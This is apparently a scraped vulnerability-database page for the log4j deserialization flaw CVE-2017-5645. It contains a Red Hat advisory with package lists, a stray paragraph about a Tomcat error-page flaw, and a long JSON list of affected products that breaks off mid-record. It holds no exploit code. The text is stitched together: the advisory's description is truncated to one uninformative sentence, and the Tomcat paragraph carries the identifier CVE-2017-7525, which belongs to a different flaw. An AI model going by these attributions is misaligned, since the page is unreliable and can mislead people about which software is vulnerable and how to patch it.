- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: rh-java-common-log4j security update Advisory ID: RHSA-2017:1417-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2017:1417 Issue date: 2017-06-08 CVE Names: CVE-2017-5645 =====================================================================
- Summary:
An update for rh-java-common-log4j is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch
- Description:
Log4j is a tool to help the programmer output log statements to a variety of output targets. (CVE-2017-5645)
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability
- Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source: rh-java-common-log4j-1.2.17-15.15.el6.src.rpm
noarch: rh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm rh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm rh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7):
Source: rh-java-common-log4j-1.2.17-15.15.el6.src.rpm
noarch: rh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm rh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm rh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source: rh-java-common-log4j-1.2.17-15.15.el6.src.rpm
noarch: rh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm rh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm rh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: rh-java-common-log4j-1.2.17-15.15.el7.src.rpm
noarch: rh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm rh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm rh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3):
Source: rh-java-common-log4j-1.2.17-15.15.el7.src.rpm
noarch: rh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm rh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm rh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source: rh-java-common-log4j-1.2.17-15.15.el7.src.rpm
noarch: rh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm rh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm rh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2017-5645 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFZOQMQXlSAg2UNWIIRAgwvAJ9zqVY6yvhkuO8Uqdtyu86+9P1VIgCgtBhf ceYEsokMPo3LCY/99DiysrI= =wZ5c -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2017-5645)
- A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. (CVE-2017-7525)
Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "mysql enterprise monitor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.0.0.0"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.5"
},
{
"_id": null,
"model": "financial services regulatory reporting with agilereporter",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.9.2.0"
},
{
"_id": null,
"model": "mysql enterprise monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4.7.4297"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0"
},
{
"_id": null,
"model": "insurance rules palette",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.1"
},
{
"_id": null,
"model": "bi publisher",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.5"
},
{
"_id": null,
"model": "communications online mediation controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1"
},
{
"_id": null,
"model": "service level manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0"
},
{
"_id": null,
"model": "endeca information discovery studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.2.0"
},
{
"_id": null,
"model": "enterprise manager for peoplesoft",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2.1.1"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7.0.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.5"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.9"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.5"
},
{
"_id": null,
"model": "insurance rules palette",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0"
},
{
"_id": null,
"model": "oncommand api services",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mysql enterprise monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "4.0.4.5235"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.6"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.0"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.4"
},
{
"_id": null,
"model": "mysql enterprise monitor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.0.0"
},
{
"_id": null,
"model": "financial services behavior detection platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4.0.0"
},
{
"_id": null,
"model": "autovue vuelink integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.1"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.8"
},
{
"_id": null,
"model": "goldengate application adapters",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.3.2.1.1"
},
{
"_id": null,
"model": "soa suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.2.0.0"
},
{
"_id": null,
"model": "instantis enterprisetrack",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.1"
},
{
"_id": null,
"model": "insurance policy administration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.2"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.5"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7.0.0"
},
{
"_id": null,
"model": "communications interactive session recorder",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2"
},
{
"_id": null,
"model": "utilities work and asset management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.9.1.2.12"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "communications network integrity",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.6"
},
{
"_id": null,
"model": "timesten in-memory database",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.2.2.8.49"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.2"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.10"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "retail advanced inventory planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "retail extract transform and load",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "enterprise linux server eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2.0.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.3.6.0.0"
},
{
"_id": null,
"model": "bi publisher",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.7.0"
},
{
"_id": null,
"model": "insurance calculation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.1.1"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "retail predictive application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3"
},
{
"_id": null,
"model": "identity manager connector",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.0"
},
{
"_id": null,
"model": "peoplesoft enterprise fin install",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2"
},
{
"_id": null,
"model": "communications converged application server - service controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1"
},
{
"_id": null,
"model": "financial services loan loss forecasting and provisioning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.4"
},
{
"_id": null,
"model": "financial services lending and leasing",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.0"
},
{
"_id": null,
"model": "in-memory performance-driven planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.4"
},
{
"_id": null,
"model": "retail open commerce platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.3.0"
},
{
"_id": null,
"model": "utilities advanced spatial and operational analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.7.0.1"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.3.0.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.3"
},
{
"_id": null,
"model": "flexcube investor servicing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.3.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "insurance rules palette",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1"
},
{
"_id": null,
"model": "autovue vuelink integration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.0"
},
{
"_id": null,
"model": "fuse",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "1.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.7"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.1"
},
{
"_id": null,
"model": "api gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.2.4.0"
},
{
"_id": null,
"model": "tape library acsls",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.4"
},
{
"_id": null,
"model": "fusion middleware mapviewer",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3"
},
{
"_id": null,
"model": "retail extract transform and load",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "log4j",
"scope": "lt",
"trust": 1.0,
"vendor": "apache",
"version": "2.8.2"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0"
},
{
"_id": null,
"model": "mysql enterprise monitor",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "3.4.0.0"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "enterprise manager for oracle database",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2.2"
},
{
"_id": null,
"model": "retail advanced inventory planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.6.2"
},
{
"_id": null,
"model": "configuration manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.2.0.2"
},
{
"_id": null,
"model": "retail extract transform and load",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "financial services lending and leasing",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "14.8.0"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0.0"
},
{
"_id": null,
"model": "insurance policy administration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.6.0"
},
{
"_id": null,
"model": "rapid planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1"
},
{
"_id": null,
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "retail clearance optimization engine",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0.5"
},
{
"_id": null,
"model": "goldengate",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.3.2.1.1"
},
{
"_id": null,
"model": "communications messaging server",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.2"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.5"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "communications pricing design center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "enterprise manager for peoplesoft",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.1.1.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "enterprise data quality",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "flexcube investor servicing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.0.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2.0"
},
{
"_id": null,
"model": "in-memory performance-driven planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.9"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.3"
},
{
"_id": null,
"model": "insurance policy administration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0"
},
{
"_id": null,
"model": "insurance rules palette",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.2"
},
{
"_id": null,
"model": "financial services behavior detection platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.0.0"
},
{
"_id": null,
"model": "communications pricing design center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1"
},
{
"_id": null,
"model": "flexcube investor servicing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.4"
},
{
"_id": null,
"model": "enterprise manager for oracle database",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.8"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.1"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.7"
},
{
"_id": null,
"model": "retail open commerce platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "oncommand insight",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "configuration manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.2.0.5"
},
{
"_id": null,
"model": "financial services lending and leasing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.5.0"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.4.7"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2.0.0"
},
{
"_id": null,
"model": "enterprise linux server eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "bi publisher",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"_id": null,
"model": "log4j",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "2.0"
},
{
"_id": null,
"model": "soa suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "mysql enterprise monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.8131"
},
{
"_id": null,
"model": "banking platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "2.6.1"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.0.1.0"
},
{
"_id": null,
"model": "snapcenter",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "rapid planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.0.0"
},
{
"_id": null,
"model": "identity management suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.2.3.0"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2.11"
},
{
"_id": null,
"model": "retail open commerce platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"_id": null,
"model": "insurance calculation engine",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.2.1"
},
{
"_id": null,
"model": "flexcube investor servicing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0"
},
{
"_id": null,
"model": "enterprise linux server eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.5"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.9.0"
},
{
"_id": null,
"model": "enterprise manager for mysql database",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2.2.0.0"
},
{
"_id": null,
"model": "identity management suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "instantis enterprisetrack",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.3"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "fusion middleware mapviewer",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.2"
},
{
"_id": null,
"model": "identity analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.1.5.8"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "insurance policy administration",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.1"
},
{
"_id": null,
"model": "soa suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.7"
},
{
"_id": null,
"model": "communications network integrity",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.2"
},
{
"_id": null,
"model": "financial services profitability management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1.1"
},
{
"_id": null,
"model": "bi publisher",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.3.0"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.5"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.7"
},
{
"_id": null,
"model": "retail extract transform and load",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "policy automation for mobile devices",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.4.7"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.6"
},
{
"_id": null,
"model": "primavera gateway",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.7"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "siebel ui framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.9"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.8"
},
{
"_id": null,
"model": "communications service broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0"
},
{
"_id": null,
"model": "flexcube investor servicing",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.0.0"
},
{
"_id": null,
"model": "retail integration bus",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.0"
},
{
"_id": null,
"model": "insurance rules palette",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.3.0.2"
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.2"
},
{
"_id": null,
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.4.6"
},
{
"_id": null,
"model": "storage automation store",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "policy automation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.10"
},
{
"_id": null,
"model": "financial services behavior detection platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.1.1"
},
{
"_id": null,
"model": "log4j",
"scope": "eq",
"trust": 0.8,
"vendor": "apache",
"version": "2.8.2"
},
{
"_id": null,
"model": "log4j",
"scope": "lt",
"trust": 0.8,
"vendor": "apache",
"version": "2.x"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-003152"
},
{
"db": "NVD",
"id": "CVE-2017-5645"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apache:log4j",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
